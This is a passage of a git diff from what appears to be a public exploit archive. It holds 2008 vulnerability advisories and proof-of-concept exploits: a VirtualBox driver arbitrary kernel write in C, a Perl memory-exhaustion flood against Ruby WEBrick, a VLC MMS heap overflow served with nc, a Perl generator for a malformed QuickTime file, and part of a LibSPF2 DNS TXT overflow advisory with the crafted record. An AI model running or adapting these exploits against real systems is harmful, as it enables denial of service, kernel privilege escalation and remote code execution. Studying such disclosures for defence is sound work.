*/ + Assert(KeGetCurrentIrql() <= DISPATCH_LEVEL); + + KeRaiseIrql(DISPATCH_LEVEL, &oldIrql); +(2) rc = supdrvIOCtlFast(ulCmd, pDevExt, pSession); + KeLowerIrql(oldIrql); + + /* Complete the I/O request. 
*/ + NTSTATUS rcNt = pIrp->IoStatus.Status = STATUS_SUCCESS; + + pIrp->IoStatus.Information = sizeof(rc); + __try + { +(3) *(int *)pIrp->UserBuffer = rc; + } + __except(EXCEPTION_EXECUTE_HANDLER) + { + rcNt = pIrp->IoStatus.Status = GetExceptionCode(); + + dprintf(("VBoxSupDrvDeviceContorl: Exception Code %#x\n", rcNt)); + } + IoCompleteRequest(pIrp, IO_NO_INCREMENT); + return rcNt; + } + + return VBoxDrvNtDeviceControlSlow(pDevExt, pSession, pIrp, pStack); + + } + +- -----------/ + +At (1), we can see the sentence checking the IOCTL code. The constants +use are defined at 'SUPDrvIOC.h' in this way: + +/----------- + +#define SUP_IOCTL_FAST_DO_RAW_RUN SUP_CTL_CODE_FAST(64) + +/** Fast path IOCtl: VMMR0_DO_HWACC_RUN */ +#define SUP_IOCTL_FAST_DO_HWACC_RUN SUP_CTL_CODE_FAST(65) +/** Just a NOP call for profiling the latency of a fast ioctl call to +VMMR0. */ +#define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66) + + +- -----------/ + +With the macro 'SUP_CTL_CODE_FAST()' defined in the same file: + +/----------- + +#define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, +(Function) + | SUP_IOCTL_FLAG, METHOD_NEITHER, + + FILE_WRITE_ACCESS) + +- -----------/ + +Now we know that the communication method used will be 'METHOD_NEITHER ' +(this could also be easily seen by looking at the resulting IOCTL code + +in the disassembled binary). + +Then at (2) the value returned by 'supdrvIOCtlFast()' is saved in 'rc' +and this is where the problem starts because at (3), the value in 'rc' +is written directly to the buffer pointer sent from usermode without any + +check to validate that it is really pointing to an usermode address or +even a valid one. 
+ +In this scenario, it is possible to feed the IOCTL with kernel addresses +to write the value returned by 'supdrvIOCtlFast()' ANY address in kernel + +space memory as many times as necessary to modify kernel code or kernel +pointers to subsequently get code execution in ring 0 context (that +means, with system privileges). + +This is the Proof of Concept I have made to trigger and show the + +vulnerability. This will generate a Blue Screen of Death (BSOD) trying +to write to an unpaged kernel mode address (0x80808080) but any other +arbitrary address could be used. + +/----------- + +// Author: Anibal Sacco (aLS) + +// Contact: anibal.sacco@coresecurity.com +// anibal.sacco@gmail.com +// Organization: Core Security Technologies + + +#include +#include + +int main(int argc, char **argv) +{ + HANDLE hDevice; + DWORD cb; + char szDevice[] = "\\\\.\\VBoxDrv"; + + if ( (hDevice = CreateFileA(szDevice, + + GENERIC_READ|GENERIC_WRITE, + 0, + 0, + OPEN_EXISTING, + 0, + NULL) ) != INVALID_HANDLE_VALUE ) + + { + printf("Device %s succesfully opened!\n", szDevice); + } + else + { + printf("Error: Error opening device %s\n",szDevice); + } + + cb = 0; + if (!DeviceIoControl(hDevice, + + 0x228103, + (LPVOID)0x80808080,0, + (LPVOID)0x80808080,0x0, + &cb, + NULL)) + { + printf("Error in DeviceIo ... bytes returned %#x\n",cb); + } +} + + +- -----------/ + + +*Report Timeline* + +. 2008-07-16: Core Security Technologies notifies the VirtualBox team of +the vulnerability. +. 2008-07-17: Vendor acknowledges notification. +. 2008-07-29: Core asks the vendor for a status update in the fixing + +process. +. 2008-07-30: Vendor notifies a patched version will be publicly +available on Monday 4th, August. +. 2008-07-31: Core asks the vendor to provide URL to their alert and to +confirm which versions are vulnerable and which version will include the + +fix. +. 2008-07-31: CVE ID request sent to Mitre. +. 2008-07-31: Bugtraq ID request sent to SecurityFocus.com. +. 
2008-07-31: CVE ID received from Mitre. +. 2008-07-31: Bugtraq ID received SecurityFocus.com. +. 2008-08-01: Vendor provides draft version of Sun Alert and URL to + +reference it. +. 2008-08-01: Core updates its security advisory with information about +vulnerable and non-vulnerable packages. Core provides its URL to the +vendor and indicates that the vendor cataloged the issue as a Denial of + +Service bug but it should be considered a privilege escalation problem +since it allows unprivileged users to execute code in the kernel context. +. 2008-08-04: Vendor confirms that this issue can lead to arbitrary code + +execution by an unprivileged user. +. 2008-08-04: CORE-2008-0716 advisory is published. + + +*References* + +[1] Sun Welcomes Innotek - http://www.sun.com/software/innotek/. + +[2] http://www.sun.com/aboutsun/pr/2008-05/sunflash.20080529.1.xml. + + +*About CoreLabs* + +CoreLabs, the research center of Core Security Technologies, is charged + +with anticipating the future needs and requirements for information +security technologies. We conduct our research in several important +areas of computer security including system vulnerabilities, cyber +attack planning and simulation, source code auditing, and cryptography. + +Our results include problem formalization, identification of +vulnerabilities, novel solutions and prototypes for new technologies. +CoreLabs regularly publishes security advisories, technical papers, +project information and shared software tools for public use at: + +http://www.coresecurity.com/corelabs/. + + +*About Core Security Technologies* + +Core Security Technologies develops strategic solutions that help +security-conscious organizations worldwide develop and maintain a + +proactive process for securing their networks. The company's flagship +product, CORE IMPACT, is the most comprehensive product for performing +enterprise security assurance testing. 
CORE IMPACT evaluates network, + +endpoint and end-user vulnerabilities and identifies what resources are +exposed. It enables organizations to determine if current security +investments are detecting and preventing attacks. Core Security +Technologies augments its leading technology solution with world-class + +security consulting services, including penetration testing and software +security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core +Security Technologies can be reached at 617-399-6980 or on the Web at + +http://www.coresecurity.com. + + +*Disclaimer* + +The contents of this advisory are copyright (c) 2008 Core Security +Technologies and (c) 2008 CoreLabs, and may be distributed freely + +provided that no fee is charged for this distribution and proper credit +is given. + + +*GPG/PGP Keys* + +This advisory has been signed with the GPG key of Core Security +Technologies advisories team, which is available for download at + +http://www.coresecurity.com/files/attachments/core_security_advisories.asc. + +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.7 (MingW32) + +Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org + +iD8DBQFIl2jIyNibggitWa0RAtj0AJ9HSRe3Hq+SCqU0RfU2LwaxINL1NwCdH5p+ +md6p6ZKbhrc7SfaD6EsxjoA= +=kQyV +-----END PGP SIGNATURE----- + +# milw0rm.com [2008-08-10] diff --git a/platforms/multiple/dos/6239.txt b/platforms/multiple/dos/6239.txt index 99af7d614..6cd337946 100755 --- a/platforms/multiple/dos/6239.txt +++ b/platforms/multiple/dos/6239.txt 
@@ -1,88 +1,88 @@ -------------------------------------------------------- -Language : Ruby - -Web Site: www.ruby-lang.org - -Platform: All - -Bug: Remote Socket Memory Leak - -Products Affected: -1.8 series: -- 1.8.5 and all prior versions -- 1.8.6-p286 and all prior versions -- 1.8.7-p71 and all prior versions - -1.9 series -- r18423 and all prior revisions - -Confirmed by the vendor: Yes - -Patch available : Yes -------------------------------------------------------- - -1) Introduction -2) Bug -3) Proof of concept -4) Credits - -=============== -1) Introduction -=============== -"A dynamic, open source programming language with a focus on simplicity and productivity. -It has an elegant syntax that is natural to read and easy to write." - -======= -2) Bug -======= -Ruby fails to handle properly the memory allocated for a socket -So when you send ~ 4 big request to a ruby socket, ruby will go -in infinite loop, and then crash. -The bug reside in the regex engine (in regex.c). - -================== -3)Proof of concept -=================== -This poc is an exemple for Webrick web server -crap.pl : - -#!/usr/bin/perl -use LWP::Simple; -my $payload = "\x41" x 49999999; -while(1) -{ -print "[+]\n"; -get "http://127.0.0.1:2500/".$payload.""; -} - -Result (Exemple on Webrick web server): - -[2008-07-11 22:39:55] INFO WEBrick 1.3.1 -[2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux] -[2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500 -[2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory - /usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line' - /usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse' - /usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run' - /usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread' - /usr/lib/ruby/1.8/webrick/server.rb:162:in `start' - /usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread' - /usr/lib/ruby/1.8/webrick/server.rb:95:in `start' - 
/usr/lib/ruby/1.8/webrick/server.rb:92:in `each' - /usr/lib/ruby/1.8/webrick/server.rb:92:in `start' - /usr/lib/ruby/1.8/webrick/server.rb:23:in `start' - /usr/lib/ruby/1.8/webrick/server.rb:82:in `start' - /home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch' - script/server:62 -[FATAL] failed to allocate memory -root@audit:/home/audit# - -===== -5)Credits -===== - -laurent gaffié - -laurent.gaffie{remove_this}[at]gmail[dot]com - -# milw0rm.com [2008-08-13] +------------------------------------------------------- +Language : Ruby + +Web Site: www.ruby-lang.org + +Platform: All + +Bug: Remote Socket Memory Leak + +Products Affected: +1.8 series: +- 1.8.5 and all prior versions +- 1.8.6-p286 and all prior versions +- 1.8.7-p71 and all prior versions + +1.9 series +- r18423 and all prior revisions + +Confirmed by the vendor: Yes + +Patch available : Yes +------------------------------------------------------- + +1) Introduction +2) Bug +3) Proof of concept +4) Credits + +=============== +1) Introduction +=============== +"A dynamic, open source programming language with a focus on simplicity and productivity. +It has an elegant syntax that is natural to read and easy to write." + +======= +2) Bug +======= +Ruby fails to handle properly the memory allocated for a socket +So when you send ~ 4 big request to a ruby socket, ruby will go +in infinite loop, and then crash. +The bug reside in the regex engine (in regex.c). 
+ +================== +3)Proof of concept +=================== +This poc is an exemple for Webrick web server +crap.pl : + +#!/usr/bin/perl +use LWP::Simple; +my $payload = "\x41" x 49999999; +while(1) +{ +print "[+]\n"; +get "http://127.0.0.1:2500/".$payload.""; +} + +Result (Exemple on Webrick web server): + +[2008-07-11 22:39:55] INFO WEBrick 1.3.1 +[2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux] +[2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500 +[2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory + /usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line' + /usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse' + /usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run' + /usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread' + /usr/lib/ruby/1.8/webrick/server.rb:162:in `start' + /usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread' + /usr/lib/ruby/1.8/webrick/server.rb:95:in `start' + /usr/lib/ruby/1.8/webrick/server.rb:92:in `each' + /usr/lib/ruby/1.8/webrick/server.rb:92:in `start' + /usr/lib/ruby/1.8/webrick/server.rb:23:in `start' + /usr/lib/ruby/1.8/webrick/server.rb:82:in `start' + /home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch' + script/server:62 +[FATAL] failed to allocate memory +root@audit:/home/audit# + +===== +5)Credits +===== + +laurent gaffié + +laurent.gaffie{remove_this}[at]gmail[dot]com + +# milw0rm.com [2008-08-13] diff --git a/platforms/multiple/dos/6293.txt b/platforms/multiple/dos/6293.txt index 70eb6f406..cd53648e6 100755 --- a/platforms/multiple/dos/6293.txt +++ b/platforms/multiple/dos/6293.txt 
@@ -1,113 +1,113 @@ ------BEGIN PGP SIGNED MESSAGE----- -Hash: SHA1 - -- - Orange Bat advisory - - -Name : VLC 0.8.6i MMS Protocol Handling -Class : Heap Overflow -Published : 2008-08-24 -Credit : g_ (g_ # orange-bat # com) - -- - Details - - -This can be exploited from remote. User have to open mmst:// -link poiting to server controlled by the attacker. - -vlc\modules\access\mms\mmstu.c : - -static int mms_ReceiveCommand( access_t *p_access ) -{ - access_sys_t *p_sys = p_access->p_sys; - - for( ;; ) - { - int i_used; - int i_status; - - if( NetFillBuffer( p_access ) < 0 ) - { - msg_Warn( p_access, "cannot fill buffer" ); - return VLC_EGENERIC; - } - if( p_sys->i_buffer_tcp > 0 ) - { -[1] i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp, - p_sys->i_buffer_tcp, &i_used ); -[2] if( i_used < MMS_BUFFER_SIZE ) - { -[3] memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used, - MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow - -(...) - -[1] - function that sets i_used to negative value, see below -[2] - i_used is signed, so predicate is true -[3] - actual overflow, we have good control over what is written - -static int mms_ParseCommand( access_t *p_access, - uint8_t *p_data, - int i_data, - int *pi_used ) -(...) - i_length = GetDWLE( p_data + 8 ) + 16; -(...) - if( i_length > p_sys->i_cmd ) - { - msg_Warn( p_access, - "truncated command (missing %d bytes)", - i_length - i_data ); - p_sys->i_command = 0; - return -1; - } -[1] else if( i_length < p_sys->i_cmd ) - { - p_sys->i_cmd = i_length; -[2] *pi_used = i_length; - } - -(...) - -[1] - predicate is true -[2] - sets i_used from mms_ReceiveCommand - -- - Proof of concept - - -on localhost: - -perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot -nc -l -v -p 1755 < headshot - -open this url in VLC: - -mmst://127.0.0.1/ - -boom! headshot :) - -- - PGP - - -All advisories from Orange Bat are signed. 
You can find our public -key here: http://www.orange-bat.com/g_.asc - -- - Disclaimer - - -This document and all the information it contains is provided "as is", -without any warranty. Orange Bat is not responsible for the -misuse of the information provided in this advisory. The advisory is -provided for educational purposes only. - -Permission is hereby granted to redistribute this advisory, providing -that no changes are made and that the copyright notices and -disclaimers remain intact. - -(c) 2008 www.orange-bat.com - - ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70 - -iEYEARECAAYFAkiwgBkACgkQIUHRVUfOLgUKOgCdFOAznbm44YJWiEqaQJK7XaF2 -AuIAnRjabi6RiPT6G/66kxseVG+K0rkj -=/CN5 ------END PGP SIGNATURE----- - -# milw0rm.com [2008-08-23] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + +- - Orange Bat advisory - + +Name : VLC 0.8.6i MMS Protocol Handling +Class : Heap Overflow +Published : 2008-08-24 +Credit : g_ (g_ # orange-bat # com) + +- - Details - + +This can be exploited from remote. User have to open mmst:// +link poiting to server controlled by the attacker. + +vlc\modules\access\mms\mmstu.c : + +static int mms_ReceiveCommand( access_t *p_access ) +{ + access_sys_t *p_sys = p_access->p_sys; + + for( ;; ) + { + int i_used; + int i_status; + + if( NetFillBuffer( p_access ) < 0 ) + { + msg_Warn( p_access, "cannot fill buffer" ); + return VLC_EGENERIC; + } + if( p_sys->i_buffer_tcp > 0 ) + { +[1] i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp, + p_sys->i_buffer_tcp, &i_used ); +[2] if( i_used < MMS_BUFFER_SIZE ) + { +[3] memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used, + MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow + +(...) + +[1] - function that sets i_used to negative value, see below +[2] - i_used is signed, so predicate is true +[3] - actual overflow, we have good control over what is written + +static int mms_ParseCommand( access_t *p_access, + uint8_t *p_data, + int i_data, + int *pi_used ) +(...) 
+ i_length = GetDWLE( p_data + 8 ) + 16; +(...) + if( i_length > p_sys->i_cmd ) + { + msg_Warn( p_access, + "truncated command (missing %d bytes)", + i_length - i_data ); + p_sys->i_command = 0; + return -1; + } +[1] else if( i_length < p_sys->i_cmd ) + { + p_sys->i_cmd = i_length; +[2] *pi_used = i_length; + } + +(...) + +[1] - predicate is true +[2] - sets i_used from mms_ReceiveCommand + +- - Proof of concept - + +on localhost: + +perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot +nc -l -v -p 1755 < headshot + +open this url in VLC: + +mmst://127.0.0.1/ + +boom! headshot :) + +- - PGP - + +All advisories from Orange Bat are signed. You can find our public +key here: http://www.orange-bat.com/g_.asc + +- - Disclaimer - + +This document and all the information it contains is provided "as is", +without any warranty. Orange Bat is not responsible for the +misuse of the information provided in this advisory. The advisory is +provided for educational purposes only. + +Permission is hereby granted to redistribute this advisory, providing +that no changes are made and that the copyright notices and +disclaimers remain intact. + +(c) 2008 www.orange-bat.com + + +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70 + +iEYEARECAAYFAkiwgBkACgkQIUHRVUfOLgUKOgCdFOAznbm44YJWiEqaQJK7XaF2 +AuIAnRjabi6RiPT6G/66kxseVG+K0rkj +=/CN5 +-----END PGP SIGNATURE----- + +# milw0rm.com [2008-08-23] diff --git a/platforms/multiple/dos/6471.pl b/platforms/multiple/dos/6471.pl index 0df43a36b..6bf59fcf4 100755 --- a/platforms/multiple/dos/6471.pl +++ b/platforms/multiple/dos/6471.pl 
@@ -1,38 +1,38 @@
-###############################################################################
-# Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash
-# Vendor: http://www.apple.com/
-# Risk : high
-#
-# The "" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
-# This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding
-# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a
-# remote crash on firefox, IE and any browser using the Quicktime plugin.
-# Code execution may be possible.
-my $payload =
-"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f".
-"\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d".
-"\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b".
-"\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e".
-"\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f".
-"\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d".
-"\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76".
-"\x65\x72\x22\x20\x2f\x3e\x00";
-
-my $file="crash.mov";
-open(my $file, ">>$file") or die "Cannot open $file: $!";
-print $file $payload;
-close($file);
-
-# milw0rm.com [2008-09-16]
+###############################################################################
+# Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash
+# Vendor: http://www.apple.com/
+# Risk : high
+#
+# The "" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
+# This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding
+# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a
+# remote crash on firefox, IE and any browser using the Quicktime plugin.
+# Code execution may be possible.
+my $payload =
+"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f".
+"\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d".
+"\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b".
+"\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e".
+"\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f".
+"\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d".
+"\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76".
+"\x65\x72\x22\x20\x2f\x3e\x00";
+
+my $file="crash.mov";
+open(my $file, ">>$file") or die "Cannot open $file: $!";
+print $file $payload;
+close($file);
+
+# milw0rm.com [2008-09-16]
diff --git a/platforms/multiple/dos/6805.txt b/platforms/multiple/dos/6805.txt
index bcef4afc3..4ed596903 100755
--- a/platforms/multiple/dos/6805.txt
+++ b/platforms/multiple/dos/6805.txt
@@ -1,256 +1,256 @@ -Advisory: DNS TXT Record Parsing Bug in LibSPF2 -Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc, -Dan.Kaminsky@ioactive.com (PGP Key In Appendix) -Abstract: - -A relatively common bug parsing TXT records delivered over DNS, dating -at least back to 2002 in Sendmail 8.2.0 and almost certainly much -earlier, has been found in LibSPF2, a library frequently used to -retrieve SPF (Sender Policy Framework) records and apply policy -according to those records. This implementation flaw allows for -relatively flexible memory corruption, and should thus be treated as a -path to anonymous remote code execution. Of particular note is that the -remote code execution would occur on servers specifically designed to -receive E-Mail from the Internet, and that these systems may in fact be -high volume mail exchangers. This creates privacy implications. It is -also the case that a corrupted email server is a useful “jumping off” -point for attackers to corrupt desktop machines, since attachments can -be corrupted with malware while the containing message stays intact. So -there are internal security implications as well, above and beyond -corruption of the mail server on the DMZ. - -Recommendations: - -If you are a major mail exchange, you should determine whether the SPAM -filters that protect your systems use LibSPF2. - -If you are a vendor of anti-SPAM devices, or the author of an operating -system with components that may use LibSPF2, you should determine -whether LibSPF2 is used in any of your configurations and migrate to -LibSPF 1.2.8, found at: - - http://www.libspf2.org/index.html - -If your product has a dependency on DNS TXT records, we recommend you -test it for the parsing bug that LibSPF2 was vulnerable to, since this -has been a problem for some time. Name server implementations may want -to consider adding filtering themselves, though record validation is not -normally their job. 
- -Details: DNS TXT records have long been a little tricky to parse, due -to them containing two length fields. First, there is the length field -of the record as a whole. Then, there is a sublength field, from 0 to -255, that describes the length of a particular character string inside -the larger record. There is nothing that links the two values, and DNS -servers to not themselves enforce sanity checks here. As such, there is -always a risk that when receiving a DNS TXT record, the outer record -length will be the amount allocated, but the inner length will be copied. - -In the past, we’ve seen this particular bug all over the place, -including in Sendmail. This is just the same bug, showing up in LibSPF2 -1.2.5: - -Spf_dns_resolv.c#SPF_dns_resolv_lookup(): - - case ns_t_txt: - if ( rdlen > 1 ) - { - u_char *src, *dst; - size_t len; - - if ( SPF_dns_rr_buf_realloc( spfrr, cnt, rdlen ) != -SPF_E_SUCCESS ) // allocate rdlen bytes at spf->rr[cn]->txt - return spfrr; - - dst = spfrr->rr[cnt]->txt; - len = 0; - src = (u_char *)rdata; - while ( rdlen > 0 ) - { - len = *src; // get a second length from the attacker -controlled datastream -- some value from 0 to 255, unbound to rdlen - src++; - memcpy( dst, src, len ); // copy that second length to -rdlen byte buffer. 
- dst += len; - src += len; - rdlen -= len + 1; - } - *dst = '\0'; - - For validation purposes, a build of LibSPF2 was instrumented, to -validate the heap overflow: - -$ ./spfquery -ip=1.2.3.4 -sender=foo@bar.toorrr.com -buffer 8107080 has size 16 -buffer 8107090 has size 16 -buffer 81070a0 has size 16 -writing 255 bytes to a 15 size buffer at 81070a0 // overflow -buffer 8123030 has size 234 -writing 233 bytes to a 234 size buffer at 8123030 -buffer 81060c0 has size 20 -buffer 81060e0 has size 20 -buffer 8123120 has size 234 -buffer 8106100 has size 31 -StartError -Context: Failed to query MAIL-FROM -ErrorCode: (2) Could not find a valid SPF record -Error: Invalid character in middle of mechanism near 'À - bar.toorrr' -Error: Failed to compile SPF record for 'bar.toorrr.com' -EndError -(invalid) - -The actual record used to spawn this behavior was as follows: - -;; HEADER SECTION -;; id = 63838 -;; qr = 1 opcode = QUERY aa = 1 tc = 0 rd = 1 -;; ra = 0 ad = 0 cd = 0 rcode = NOERROR -;; qdcount = 1 ancount = 2 nscount = 0 arcount = 0 - -;; QUESTION SECTION (1 record) -;; bar.toorrr.com. IN TXT - -;; ANSWER SECTION (2 records) -bar.toorrr.com. 0 IN TXT "v=spf1 mx +all" -bar.toorrr.com. 0 IN TXT -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - -;; AUTHORITY SECTION (0 records) - -;; ADDITIONAL SECTION (0 records) - -Or, in hex: - - 00 01 02 03 04 05 06 07 - 08 09 0A 0B 0C 0D 0E 0F -0123456789ABCDEF - -00000000 F9 5E 85 00 00 01 00 02 - 00 00 00 00 03 62 61 72 -.^...........bar -00000010 06 74 6F 6F 72 72 72 03 - 63 6F 6D 00 00 10 00 01 -.toorrr.com..... -00000020 C0 0C 00 10 00 01 00 00 - 00 00 00 0F FF 76 3D 73 -.............v=s -00000030 70 66 31 20 6D 78 20 2B - 61 6C 6C C0 0C 00 10 00 pf1 mx -+all..... 
-00000040 01 00 00 00 00 00 EA E9 - 41 41 41 41 41 41 41 41 -........AAAAAAAA -00000050 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000060 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000070 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000080 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000090 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000A0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000B0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000C0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000D0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000E0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000F0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000100 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000110 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 